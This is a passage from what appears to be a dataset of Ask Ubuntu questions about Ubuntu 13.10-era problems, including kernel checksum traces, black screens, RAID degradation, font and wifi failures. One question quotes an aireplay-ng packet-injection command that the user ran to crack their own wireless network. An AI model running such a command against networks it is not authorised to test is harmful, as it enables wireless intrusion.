cpu : 0 pid : 5992 comm : kwin tainted : pf o 3.11.0-12-generic # 19-ubuntu [ 8040.634319 ] hardware name : system manufacturer system product name/a8r-mvp , bios 0605 12/09/2008 [ 8040.634324 ] ffff88007466ac62 ffff88013fc03af0 ffffffff816e547a ffff880134d66000 [ 8040.634334 ] ffff88013fc03b08 ffffffff815ec43a ffff8800782fa100 ffff88013fc03b28 [ 8040.634341 ] ffffffff815e5422 00000000810925f9 ffff8800782fa100 ffff88013fc03b38 [ 8040.634348 ] call trace : [ 8040.634353 ] < irq > [ < ffffffff816e547a > ] dump_stack+0x45/0x56 [ 8040.634377 ] [ < ffffffff815ec43a > ] netdev_rx_csum_fault+0x3a/0x40 [ 8040.634385 ] [ < ffffffff815e5422 > ] __skb_checksum_complete_head+0x62/0x70 [ 8040.634392 ] [ < ffffffff815e5441 > ] __skb_checksum_complete+0x11/0x20 [ 8040.634402 ] [ < ffffffff8167100c > ] nf_ip_checksum+0xcc/0x100 [ 8040.634428 ] [ < ffffffffa0d1c8c2 > ] tcp_error+0x1b2/0x260 [ nf_conntrack ] [ 8040.634438 ] [ < ffffffff8109484a > ] ? try_to_wake_up+0x20a/0x2b0 [ 8040.634453 ] [ < ffffffffa0d183de > ] nf_conntrack_in+0xee/0xad0 [ nf_conntrack ] [ 8040.634462 ] [ < ffffffff8109edfe > ] ? update_group_power+0x13e/0x220 [ 8040.634472 ] [ < ffffffff8135ba9e > ] ? cpumask_next_and+0x2e/0x40 [ 8040.634483 ] [ < ffffffffa0d632f1 > ] ipv4_conntrack_in+0x21/0x30 [ nf_conntrack_ipv4 ] [ 8040.634490 ] [ < ffffffff8161cb5b > ] nf_iterate+0x8b/0xa0 [ 8040.634499 ] [ < ffffffff81623030 > ] ? inet_del_offload+0x40/0x40 [ 8040.634505 ] [ < ffffffff8161cbe4 > ] nf_hook_slow+0x74/0x130 [ 8040.634511 ] [ < ffffffff81623030 > ] ? inet_del_offload+0x40/0x40 [ 8040.634518 ] [ < ffffffff81623a74 > ] ip_rcv+0x344/0x380 [ 8040.634525 ] [ < ffffffff815eec66 > ] __netif_receive_skb_core+0x646/0x830 [ 8040.634531 ] [ < ffffffff815eee68 > ] __netif_receive_skb+0x18/0x60 [ 8040.634537 ] [ < ffffffff815eeed3 > ] netif_receive_skb+0x23/0x90 [ 8040.634543 ] [ < ffffffff815ef940 > ] napi_gro_receive+0x80/0xb0 [ 8040.634568 ] [ < ffffffffa002e2e6 > ] skge_poll+0x3a6/0x870 [ skge ] [ 8040.634575 ] [ < ffffffff8109b6a8 > ] ? update_curr+0x168/0x180 [ 8040.634581 ] [ < ffffffff815ef20c > ] net_rx_action+0x11c/0x240 [ 8040.634589 ] [ < ffffffff81067397 > ] __do_softirq+0xf7/0x240 [ 8040.634596 ] [ < ffffffff81067675 > ] irq_exit+0xb5/0xc0 [ 8040.634604 ] [ < ffffffff816f7516 > ] do_irq+0x56/0xc0 [ 8040.634611 ] [ < ffffffff816ecb2d > ] common_interrupt+0x6d/0x6d [ 8040.634614 ] < eoi > [ < ffffffff815b4fd0 > ] ? acpi_pm_read+0x10/0x20 [ 8040.634630 ] [ < ffffffff810b7ae8 > ] ktime_get_ts+0x48/0xe0 [ 8040.634639 ] [ < ffffffff81082cf1 > ] posix_ktime_get_ts+0x11/0x20 [ 8040.634647 ] [ < ffffffff810841c5 > ] sys_clock_gettime+0x45/0xa0 [ 8040.634654 ] [ < ffffffff816f521d > ] system_call_fastpath+0x1a/0x1f [ 8043.080363 ] eth0 : hw csum failure [ 8043.080382 ] cpu : 0 pid : 0 comm : swapper/0 tainted : pf o 3.11.0-12-generic # 19-ubuntu [ 8043.080387 ] hardware name : system manufacturer system product name/a8r-mvp , bios 0605 12/09/2008 [ 8043.080392 ] ffff880137b6b162 ffff88013fc03af0 ffffffff816e547a ffff880134d66000 [ 8043.080401 ] ffff88013fc03b08 ffffffff815ec43a ffff880071b2d800 ffff88013fc03b28 [ 8043.080409 ] ffffffff815e5422 00000000815e0673 ffff880071b2d800 ffff88013fc03b38 [ 8043.080416 ] call trace : [ 8043.080421 ] < irq > [ < ffffffff816e547a > ] dump_stack+0x45/0x56 [ 8043.080445 ] [ < ffffffff815ec43a > ] netdev_rx_csum_fault+0x3a/0x40 [ 8043.080453 ] [ < ffffffff815e5422 > ] __skb_checksum_complete_head+0x62/0x70 [ 8043.080459 ] [ < ffffffff815e5441 > ] __skb_checksum_complete+0x11/0x20 [ 8043.080469 ] [ < ffffffff8167100c > ] nf_ip_checksum+0xcc/0x100 [ 8043.080495 ] [ < ffffffffa0d1c8c2 > ] tcp_error+0x1b2/0x260 [ nf_conntrack ] [ 8043.080504 ] [ < ffffffff815ddfe7 > ] ? kfree_skbmem+0x37/0x90 [ 8043.080511 ] [ < ffffffff815e07da > ] ? __kfree_skb+0x1a/0x20 [ 8043.080519 ] [ < ffffffff8163d4c1 > ] ? tcp_rcv_state_process+0xac1/0xcc0 [ 8043.080534 ] [ < ffffffffa0d183de > ] nf_conntrack_in+0xee/0xad0 [ nf_conntrack ] [ 8043.080543 ] [ < ffffffff8109edfe > ] ? update_group_power+0x13e/0x220 [ 8043.080553 ] [ < ffffffff8135ba9e > ] ? cpumask_next_and+0x2e/0x40 [ 8043.080564 ] [ < ffffffffa0d632f1 > ] ipv4_conntrack_in+0x21/0x30 [ nf_conntrack_ipv4 ] [ 8043.080571 ] [ < ffffffff8161cb5b > ] nf_iterate+0x8b/0xa0 [ 8043.080579 ] [ < ffffffff81623030 > ] ? inet_del_offload+0x40/0x40 [ 8043.080585 ] [ < ffffffff8161cbe4 > ] nf_hook_slow+0x74/0x130 [ 8043.080592 ] [ < ffffffff81623030 > ] ? inet_del_offload+0x40/0x40 [ 8043.080599 ] [ < ffffffff81623a74 > ] ip_rcv+0x344/0x380 [ 8043.080606 ] [ < ffffffff815eec66 > ] __netif_receive_skb_core+0x646/0x830 [ 8043.080613 ] [ < ffffffff815eee68 > ] __netif_receive_skb+0x18/0x60 [ 8043.080619 ] [ < ffffffff815eeed3 > ] netif_receive_skb+0x23/0x90 [ 8043.080625 ] [ < ffffffff815ef940 > ] napi_gro_receive+0x80/0xb0 [ 8043.080649 ] [ < ffffffffa002e2e6 > ] skge_poll+0x3a6/0x870 [ skge ] [ 8043.080659 ] [ < ffffffff8106aea8 > ] ? bin_uuid+0xd8/0x130 [ 8043.080665 ] [ < ffffffff815ef20c > ] net_rx_action+0x11c/0x240 [ 8043.080672 ] [ < ffffffff81067397 > ] __do_softirq+0xf7/0x240 [ 8043.080679 ] [ < ffffffff81067675 > ] irq_exit+0xb5/0xc0 [ 8043.080687 ] [ < ffffffff816f7516 > ] do_irq+0x56/0xc0 [ 8043.080695 ] [ < ffffffff816ecb2d > ] common_interrupt+0x6d/0x6d [ 8043.080698 ] < eoi > [ < ffffffff8104d386 > ] ? native_safe_halt+0x6/0x10 [ 8043.080713 ] [ < ffffffff8101b22f > ] default_idle+0x1f/0xc0 [ 8043.080720 ] [ < ffffffff8101baf6 > ] arch_cpu_idle+0x26/0x30 [ 8043.080729 ] [ < ffffffff810b54ee > ] cpu_startup_entry+0xce/0x280 [ 8043.080737 ] [ < ffffffff816d4727 > ] rest_init+0x77/0x80 [ 8043.080746 ] [ < ffffffff81d26ef7 > ] start_kernel+0x40a/0x416 [ 8043.080754 ] [ < ffffffff81d268f6 > ] ? repair_env_string+0x5c/0x5c [ 8043.080761 ] [ < ffffffff81d26120 > ] ? early_idt_handlers+0x120/0x120 [ 8043.080768 ] [ < ffffffff81d265de > ] x86_64_start_reservations+0x2a/0x2c [ 8043.080775 ] [ < ffffffff81d266e8 > ] x86_64_start_kernel+0x108/0x117 i know this question seems to be a duplicate of internet connection lost after upgrade to kubuntu 13.10 , but as you can see from my logs , network-manager has been upgraded directly to the latest version which is assumed to solve this issue . update : i tried booting ubuntu 13.10 from a live session and i 'm experiencing the same problem , so it 's not happening just on kubuntu . is there any regression in the kernel ? a live 13.04 does n't show this problem . also filed bug # 1241897 .
361451	stuck at `` installation type '' screen while installing	the title is pretty clear , but here are a few details : i 'm installing from a usb , onto a computer running windows 7 . everything seems to run perfectly , until i get to the `` installation type '' screen . essentially , i am not getting a choice for my install : i directly get to the partitionning screen ( with options like `` new partition table ... '' , `` add ... '' , `` change ... '' etcetera , as well as a drop-down menu `` device for boot loader installation : '' . anyhow , nothing responds on this screen ( but the computer does not seem frozen ) . from the ubunt website scrrenshots , this should be pretty straightforward ! any suggestion on how i could get this thing installed tonight ? ( thanks to all of you , by the way ! )
361452	tory systemd-undevd : failed to execute . i get this in a black screen every time i restartd	upgraded to the latest version of ubuntu and it told me to delete some packages after the install , but i kept them i do n't know if that is what caused the problem , but every time i restart my computer a black screen pops up with filled with failed systemd-undev failed to execute . how do i solve this problem ? here is a picture http : //answers.yahoo.com/question/index ? qid=20131018163027aaklad0
361453	ubuntu 13.04 freezes while trying to do something through the terminal ! ! i need help	i tried to crack my own wireless in order to test how easy it can be cracked ! ( i followed this video tutorial ) . everything was okay until i typed this command sudo aireplay-ng -2 -p 6000 -c ff : ff : ff : ff : ff : ff -b 4c:60 : de:48:72:15 -h 00:11:22:33:44:55 mon0 and pressed y and enter to continue . now , my computer freezes and nothing is responding ; the mouse pointer does n't move anymore and the keyboard does n't register any keystrokes ! what should i do ?
361454	ubuntu 13.10 , kernel 3.11 blank screen issue with hybrid graphics	on my hp envy , which has both an intel on-chip graphics card and an nvidia geforce : *-display unclaimed description : 3d controller product : gk208m [ geforce gt 740m ] vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:01:00.0 version : a1 width : 64 bits clock : 33mhz capabilities : cap_list configuration : latency=0 resources : memory : d2000000-d2ffffff memory : a0000000-afffffff memory : b0000000-b1ffffff ioport:5000 ( size=128 ) memory : b2000000-b207ffff *-display description : vga compatible controller product : 4th gen core processor integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 06 width : 64 bits clock : 33mhz capabilities : vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:46 memory : d3000000-d33fffff memory : c0000000-cfffffff ioport:6000 ( size=64 ) i have trouble with all newer kernels . i basically had to install 12.04 lts and use their 3.5 kernel family to get the system to boot . the 3.8 from 12.10 or the newest 3.11 from ubuntu 13.10 leave me with a black screen upon boot . on one occasion i did hear the `` log in '' sound , but the screen did not display anything . i have purged all nvidia drivers so i guess it should just use the intel drivers , but apparently this is all messed up with newer kernel versions . this is different from the other `` nvidia boots into blank screen '' bug in that i do n't rely solely on an nvidia card . surely the intel on-chip card should be supported and leave me with something different from a blank screen ? again , it only works with kernel versions 3.5.0-41-generic , not with the 3.11.0-12 one that ships with ubuntu 13.10 . when i go into the grub menu and change the boot options from 'quiet splash ' to 'nomodeset ' i am able to boot the system , but then i do n't get any graphics and trying 'sudo service lightdm start ' does n't succeed ( i get 100 % cpu for apport , but this does n't do anything either , so i kill it ) . help , i 'm all out of ideas . edit : let me add that i 'm using the efi boot system and have a dual-boot installation with windows 8 .
361456	where can i get ubuntu in german	i am german . i would like to know where i can get a german version of ubuntu .
361459	can i write ubuntu phone applications in c/c++ ?	as a console game programmer , i have lots of code already written in c++ that i 'd like to port to the ubuntu phone . i see the the qt-based environment lets you `` extend '' qt with c++ , but i really just want to write programs native in c++ . is that possible ? is there some documentation on how to do that ?
361463	flash drives installer ?	i know i used to be able to install ubuntu on a flash drive , then install it on a hard drive , using the flash , instead of a cd . its been a few years since i 've had to install from a flash drive , so i 'm wondering , is it still possible , and if so , how ? also any information on dual-boot with windows 7 64bit would be appreciated . thanks !
361464	13.10 broke radeon hdmi audo	makes me so angry that after finally figuring out to modify grub configuration to set radeon.audio=1 13.10 update killed my audio . zero sound through hdmi . how to fix this ? dell zino hd .
361465	nautilus for desktop shortcuts	i do n't know where to get help with this , because i 'm afraid of getting flamed in both ends , but i run unity on mint , and i replace nemo ( or whatever it was ) with nautilus as my file manager as well , and that seemed to work , but when i click my mounted drives or folders from my desktop , it still opens in nemo or caja or whatever it is . any ideas ?
361466	how to log into an ubuntu session when the system continuously reboots in a loop ?	i 'm using ubuntu 12.04.3 with unity and when i turned on the machine today i got the following message : could not write bytes broken pipe ubuntu 12.04 after trying to fix this , ( like reinstalling xorg ) and remembering the following line : x can not stat /etc/x11/x ( no such file or directory ) aborting ubuntu 12.04 now i can access log session , but when i type in my password and enter the log session , the system reboots in a loop , so that i still ca n't enter in my session . anyone with this problem and how to fix it ?
361469	how can i remove desktop icon like home , network server	i am using ubuntu 13'10 . home and network server have been set as desktop icon anyway . how can i remove them ?
361470	menus unrensponsive after 13.10 upgrade	after a 13.10 upgrade which seems otherwise allright , i am experiencing some delay and unresponsiveness when clicking on menus in the global bar . this happens on two computers of mine , both upgraded to 13.10 . i am wondering if , before going through a clean install , there is something i can try ( like trashing some preference or uninstalling some package ) . i know it 's nearly impossible for anybody to know what my issue is - must be something i installed on both pcs , but what ? - but maybe you can point me in the right direction . thanks !
361472	downloading a windows driver on 13.10	how would i go about downloading a windows driver , such as wna 3100 to ubuntu 13.10 ? i was unaware that i would be unable to use my wireless card upon installing it onto my computer before i had done so already .
361477	am i being served a beta release of 13.10 ?	today , i followed the instructions at https : //help.ubuntu.com/community/saucyupgrades ( ubuntu desktops 13.04 to 13.10 ) . when i got to step # 6 , the release notes popped up , and the first two lines said : welcome to the ubuntu 'saucy salamander ' development release this is still a beta release . do not install it on production machines . is my system trying to get outdated files , or is is safe to ignore those notes ?
361478	dual boot win 7 ubuntu - home and boot partitions have no mount point	after installing ubuntu 12.04.3 on a windows 7 laptop , running ubuntu disk utility showed the following partition information ; /dev/sda1 ntfs , bootable , filesystem , labled : system reserved , 105mb , not mounted /dev/sda2 ntfs , no flag , filesystem , no label , 84gb , not mounted /dev/sda3 usage : container for logical partitions . partition type : extended ( 0x05 ) . no flags . no label . capacity : 416gb /dev/sda5 usage : filesystem . partition type : linux ( 0x83 ) . no partition label . no flags . capacity : 999mb . type : ext4 ( ver 1.0 ) . available : - . label : - . mount point : not mounted /dev/sda8 usage : filesystem . partition type : linux ( 0x83 ) . no partition label . no flags . capacity : 30gb . type : ext4 ( ver 1.0 ) . available : - . label : - . mount point : mounted at / /dev/sda6 usage : filesystem . partition type : linux ( 0x83 ) . no partition label . no flags . capacity : 377gb . type : ext4 ( ver 1.0 ) . available : - . label : - . mount point : not mounted /dev/sda7 usage : swap space . partition type : linux ( 0x82 ) . no partition label . no flags . capacity : 8.4gb . sda2 contains windows 7 but without a mount point sda6 should have been the home partition and sda5 should have been the boot partition but the mount points seem to have been lost and now everything but swap has gone into the root partition sda8 ( the home folder also seems to be within sda8 ) . how do i go about getting sda6 used as the home partition and sda5 as boot output of /etc/fstab as requested pb @ lc1 : ~ $ cat /etc/fstab # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sdb8 during installation uuid=f80d2f67-db1e-42a7-a321-437c94354623 / ext4 errors=remount-ro 0 1 # swap was on /dev/sdb7 during installation uuid=06fcb820-41d6-4767-92a7-99baf6849673 none swap sw 0 0 pb @ lc1 : ~ $
361482	kernel copy windows and edit in linux	i have an interesting question . if i copy the kernel of windows and tries to run in linux will it be possible to edit and create my own new one which is competiting to windows . ?
361485	ca n't display other font than sans	my ubuntu install ( upgrade from 13.04 ) no longer displays any font that is not regular sans . i do n't have a monospace font ( miss it so much ! ) , terminals and everywhing displays in the same font but just italic or bold . even gimp crashes when working with fonts . something is not right , i hoped this would go away by upgrading to 13.10 but it did n't . i 've been having this issue for some months now and is super annoying : ( changing fonts has no effect , even though i can see the preview . except sometimes on numbers , they actually display the font . here is a gif image showing this : http : //i.stack.imgur.com/5hlhs.gif i 'd really appreciate any help , thanks in advance for your time .
361487	session login not showing	i can not now see the session login screen - just a blank black screen . no icons , no username box etc . is displaying . this is on a compaq presario c700 laptop running ubuntu 13.04 . yesterday the machine was running fine and it was shut down normally . no changes have recently been made . today i switched on and the os seemed to be booting up ok , accepted my password for the encrypted volume and the progress screen progressed to the point where i expected the desktop session login screen to show - but nothing ! gnome , unity and lxde desktops are installed with lxde being the current session . any suggestions appreciated .
361488	ubuntu 13.10 issue , booting to non-graphical login breaks unity	i just did a fresh install of ubuntu 13.10 desktop ( amd64 version ) , and once it was up and running , i installed some extra packages like git and build-essential and vim , etc. , and then rebooted and suddenly unity would quit working . when i would log in , i would see my wallpaper , but no launcher or anything else . after many hours playing with dconf and ccsm and actually re-installing several times , i think i found the issue , but i do n't know how to fix it . i prefer to normally boot to a console ( non-graphical ) login , and then if i want to launch x , i can do so with `` startx '' . this is normally something easy to do , by editing /etc/default/grub and changing the line , and running `` sudo update-grub '' afterwards . edit this line in /etc/default/grub : grub_cmdline_linux_default= '' quiet splash '' change to one of the following lines ( i tried all three , when my just plain `` text '' did n't work ) : grub_cmdline_linux_default= '' text '' # or ... grub_cmdline_linux_default= '' quiet splash text '' # or ... grub_cmdline_linux_default= '' '' if i boot to a non-graphical console login prompt , and run `` startx -- -depth 24 '' , unity starts up and i just get the wall-paper and no launcher or anything else . i then have to use ctrl-alt-f1 to go to a virtual console , use ctrl-c to kill x , and then change the grub_cmdline_linux_default line in /etc/default/grub back to `` quiet splash '' , and run update-grub and reboot , and unity starts working perfectly again . i suspect that there 's some sort of unity service that is getting started with the graphical login , but that does not get started if you use a non-graphical console login . however , i am not an expert in the inner workings of unity . does anyone have any ideas on what the problem could be ? thanks !
361489	problem with mdadm raid5 after power failure , disk missing	i 've been running my server with ubuntu server 12.10 for quite some time now and it 's been up for about 260 days give or take . this morning we had a power outage which unfortunately did not only reset my uptime , but seems to have destroyed one of my disks in my raid5 array . i have four 2tb drives connected to the raid by the following identifiers : /dev/sda /dev/sdc /dev/sdd /dev/sde although , now that i boot my server it spawns a degraded raid and boots me into initramfs , from which i am able to exit using the command exit . i 'm now fearing that my one disk has been rendered unusable . this is the output following the command cat /proc/mdstat : personalities : [ linear ] [ multipath ] [ raid0 ] [ raid1 ] [ raid6 ] [ raid5 ] [ raid4 ] [ raid10 ] md0 : active raid5 sdc1 [ 1 ] sdd1 [ 3 ] sde [ 5 ] 5860535808 blocks super 1.2 level 5 , 512k chunk , algorithm 2 [ 4/3 ] [ _uuu ] from what i understand when search the web , an underscore in the [ uuuu ] section means that the drive for some reason is not functioning properly . am i correct ? if so , my only logical explanation is that the disk /dev/sda has somehow been rendered unusable . what do you think ? a simple sudo fdisk -l returns the following data about the disk , which looks about normal . disk /dev/sda : 2000.4 gb , 2000398934016 bytes 81 heads , 63 sectors/track , 765633 cylinders , total 3907029168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x00071c7e device boot start end blocks id system /dev/sda1 2048 3907029167 1953513560 fd linux raid autodetect now i am all out of ideas , and i would really like to get my raid up and running properly again . please help me , and if the disk is broken i 'll have to go get another tomorrow . thanks in advance , jonathan edit : here is a full dump of sudo fdisk -l : disk /dev/sda : 2000.4 gb , 2000398934016 bytes 81 heads , 63 sectors/track , 765633 cylinders , total 3907029168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x00071c7e device boot start end blocks id system /dev/sda1 2048 3907029167 1953513560 fd linux raid autodetect disk /dev/sdb : 60.0 gb , 60022480896 bytes 255 heads , 63 sectors/track , 7297 cylinders , total 117231408 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000bab94 device boot start end blocks id system /dev/sdb1 * 2048 499711 248832 83 linux /dev/sdb2 501758 117229567 58363905 5 extended /dev/sdb5 501760 117229567 58363904 8e linux lvm disk /dev/sdc : 2000.4 gb , 2000398934016 bytes 81 heads , 63 sectors/track , 765633 cylinders , total 3907029168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x000bfd1e device boot start end blocks id system /dev/sdc1 2048 3907029167 1953513560 fd linux raid autodetect disk /dev/sdd : 2000.4 gb , 2000398934016 bytes 81 heads , 63 sectors/track , 765633 cylinders , total 3907029168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x000291ea device boot start end blocks id system /dev/sdd1 2048 3907029167 1953513560 fd linux raid autodetect warning : gpt ( guid partition table ) detected on '/dev/sde ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sde : 2000.4 gb , 2000398934016 bytes 255 heads , 63 sectors/track , 243201 cylinders , total 3907029168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0xb177b0f7 device boot start end blocks id system /dev/sde1 1 3907029167 1953514583+ ee gpt partition 1 does not start on physical sector boundary . disk /dev/md0 : 6001.2 gb , 6001188667392 bytes 2 heads , 4 sectors/track , 1465133952 cylinders , total 11721071616 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 524288 bytes / 1572864 bytes disk identifier : 0x00000000 disk /dev/md0 does n't contain a valid partition table also , i tried running sudo mdadm -v -- examine /dev/sdx1 , where i found an anomality . the command works fine for all the disks except for /dev/sde1 , where i had to use /dev/sde and skip the partition . only then would i get the correct output , which shows a missing disk in the status , .aaa while all the others say aaaa like it should . to me , it seems like /dev/sde1 is the culprit , but i ca n't fully judge . i do n't dare to disconnect the drives as i do n't know what will happen then . what do you think ? edit 2 : i 'm now fairly confident that /dev/sde is the culprit , but i 'm not entirely sure . please see this paste for more debug info : http : //paste.ubuntu.com/6262980/ thanks in advance !
361491	desktop has become a grey void in xubuntu 13.10	i upgraded from xubuntu 13.04 to 13.10 . everything seemed fine . then i turned the computer off ... rebooted and signed in and the desktop wallpaper and icons and files on the desktop are gone . replaced by a grey void . the top and bottom panels are still present and i can run programs from the menu or the launcher along the bottom of the screen . if i go into settings and try to change my wallpaper it shows the correct image selected yet the desktop stays grey . i change the ocons that are to be listed on the desktop and it stays empty grey . please someone help me .
361495	kubuntu 13.10 wifi does n't work - dhcp timeout	i have a realtek rtl8188ce 802.11b/g/n wifi adapter in my computer . today i upgraded to 13.10 and i ca n't connect . before upgrading wifi worked just fine . i can see wifi networks , but it just gives the error `` ip configuration was unavailable '' when trying to connect . other devices work just fine . i 've tried deleting the configuration and remaking it multiple times , and that does n't work . so , looking at syslog , it seems the dhcp request is timing out . i can connect to the network if i manually set the ip and other settings , but i do n't have internet connection through wifi yet - i think my manual configuration is a little off yet . here is lspci : chrisn @ zircon : ~ $ lspci | grep wifi 02:00.0 network controller : realtek semiconductor co. , ltd. rtl8188ce 802.11b/g/n wifi adapter ( rev 01 ) and output from lshw -c network *-network description : wireless interface product : rtl8188ce 802.11b/g/n wifi adapter vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 01 serial : 54:04 : a6 : de : cb : ba width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=rtl8192ce driverversion=3.11.0-12-generic firmware=n/a latency=0 link=no multicast=yes wireless=ieee 802.11bgn resources : irq:16 ioport : d000 ( size=256 ) memory : fe500000-fe503fff this is /var/log/syslog from the point i clicked the `` connect '' button to when it gave up . chrisn @ zircon : ~ $ sudo tail -f -n0 /var/log/syslog oct 19 14:03:05 zircon networkmanager [ 909 ] : < info > activation ( wlan0 ) starting connection 'diamond' oct 19 14:03:05 zircon networkmanager [ 909 ] : < info > ( wlan0 ) : device state change : disconnected - > prepare ( reason 'none ' ) [ 30 40 0 ] oct 19 14:03:05 zircon networkmanager [ 909 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) scheduled ... oct 19 14:03:05 zircon networkmanager [ 909 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) started ... oct 19 14:03:05 zircon networkmanager [ 909 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) scheduled ... oct 19 14:03:05 zircon networkmanager [ 909 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) complete . oct 19 14:03:05 zircon networkmanager [ 909 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) starting ... oct 19 14:03:05 zircon networkmanager [ 909 ] : < info > ( wlan0 ) : device state change : prepare - > config ( reason 'none ' ) [ 40 50 0 ] oct 19 14:03:05 zircon networkmanager [ 909 ] : < info > activation ( wlan0/wireless ) : access point 'diamond ' has security , but secrets are required . oct 19 14:03:05 zircon networkmanager [ 909 ] : < info > ( wlan0 ) : device state change : config - > need-auth ( reason 'none ' ) [ 50 60 0 ] oct 19 14:03:05 zircon networkmanager [ 909 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) complete . oct 19 14:03:05 zircon networkmanager [ 909 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) scheduled ... oct 19 14:03:05 zircon networkmanager [ 909 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) started ... oct 19 14:03:05 zircon networkmanager [ 909 ] : < info > ( wlan0 ) : device state change : need-auth - > prepare ( reason 'none ' ) [ 60 40 0 ] oct 19 14:03:05 zircon networkmanager [ 909 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) scheduled ... oct 19 14:03:05 zircon networkmanager [ 909 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) complete . oct 19 14:03:05 zircon networkmanager [ 909 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) starting ... oct 19 14:03:05 zircon networkmanager [ 909 ] : < info > ( wlan0 ) : device state change : prepare - > config ( reason 'none ' ) [ 40 50 0 ] oct 19 14:03:05 zircon networkmanager [ 909 ] : < info > activation ( wlan0/wireless ) : connection 'diamond ' has security , and secrets exist . no new secrets needed . oct 19 14:03:05 zircon networkmanager [ 909 ] : < info > config : added 'ssid ' value 'diamond' oct 19 14:03:05 zircon networkmanager [ 909 ] : < info > config : added 'scan_ssid ' value '1' oct 19 14:03:05 zircon networkmanager [ 909 ] : < info > config : added 'key_mgmt ' value 'none' oct 19 14:03:05 zircon networkmanager [ 909 ] : < info > config : added 'auth_alg ' value 'open' oct 19 14:03:05 zircon networkmanager [ 909 ] : < info > config : added 'wep_key0 ' value ' < omitted > ' oct 19 14:03:05 zircon networkmanager [ 909 ] : < info > config : added 'wep_tx_keyidx ' value '0' oct 19 14:03:05 zircon networkmanager [ 909 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) complete . oct 19 14:03:05 zircon networkmanager [ 909 ] : < info > config : set interface ap_scan to 1 oct 19 14:03:06 zircon networkmanager [ 909 ] : < info > ( wlan0 ) : supplicant interface state : disconnected - > scanning oct 19 14:03:07 zircon wpa_supplicant [ 1415 ] : wlan0 : sme : trying to authenticate with 00:1f:33 : e9:99:8a ( ssid='diamond ' freq=2437 mhz ) oct 19 14:03:07 zircon kernel : [ 1911.641635 ] wlan0 : authenticate with 00:1f:33 : e9:99:8a oct 19 14:03:07 zircon networkmanager [ 909 ] : < info > ( wlan0 ) : supplicant interface state : scanning - > authenticating oct 19 14:03:07 zircon kernel : [ 1911.651176 ] wlan0 : send auth to 00:1f:33 : e9:99:8a ( try 1/3 ) oct 19 14:03:07 zircon wpa_supplicant [ 1415 ] : wlan0 : trying to associate with 00:1f:33 : e9:99:8a ( ssid='diamond ' freq=2437 mhz ) oct 19 14:03:07 zircon kernel : [ 1911.654471 ] wlan0 : authenticated oct 19 14:03:07 zircon kernel : [ 1911.654701 ] rtl8192ce 0000:02:00.0 wlan0 : disabling ht/vht due to wep/tkip use oct 19 14:03:07 zircon kernel : [ 1911.656855 ] wlan0 : associate with 00:1f:33 : e9:99:8a ( try 1/3 ) oct 19 14:03:07 zircon networkmanager [ 909 ] : < info > ( wlan0 ) : supplicant interface state : authenticating - > associating oct 19 14:03:07 zircon wpa_supplicant [ 1415 ] : wlan0 : associated with 00:1f:33 : e9:99:8a oct 19 14:03:07 zircon wpa_supplicant [ 1415 ] : wlan0 : ctrl-event-connected - connection to 00:1f:33 : e9:99:8a completed ( reauth ) [ id=0 id_str= ] oct 19 14:03:07 zircon kernel : [ 1911.660841 ] wlan0 : rx assocresp from 00:1f:33 : e9:99:8a ( capab=0x431 status=0 aid=4 ) oct 19 14:03:07 zircon kernel : [ 1911.660951 ] wlan0 : associated oct 19 14:03:07 zircon kernel : [ 1911.661236 ] cfg80211 : calling crda for country : us oct 19 14:03:07 zircon networkmanager [ 909 ] : < info > ( wlan0 ) : supplicant interface state : associating - > completed oct 19 14:03:07 zircon networkmanager [ 909 ] : < info > activation ( wlan0/wireless ) stage 2 of 5 ( device configure ) successful . connected to wireless network 'diamond ' . oct 19 14:03:07 zircon networkmanager [ 909 ] : < info > activation ( wlan0 ) stage 3 of 5 ( ip configure start ) scheduled . oct 19 14:03:07 zircon networkmanager [ 909 ] : < info > activation ( wlan0 ) stage 3 of 5 ( ip configure start ) started ... oct 19 14:03:07 zircon networkmanager [ 909 ] : < info > ( wlan0 ) : device state change : config - > ip-config ( reason 'none ' ) [ 50 70 0 ] oct 19 14:03:07 zircon networkmanager 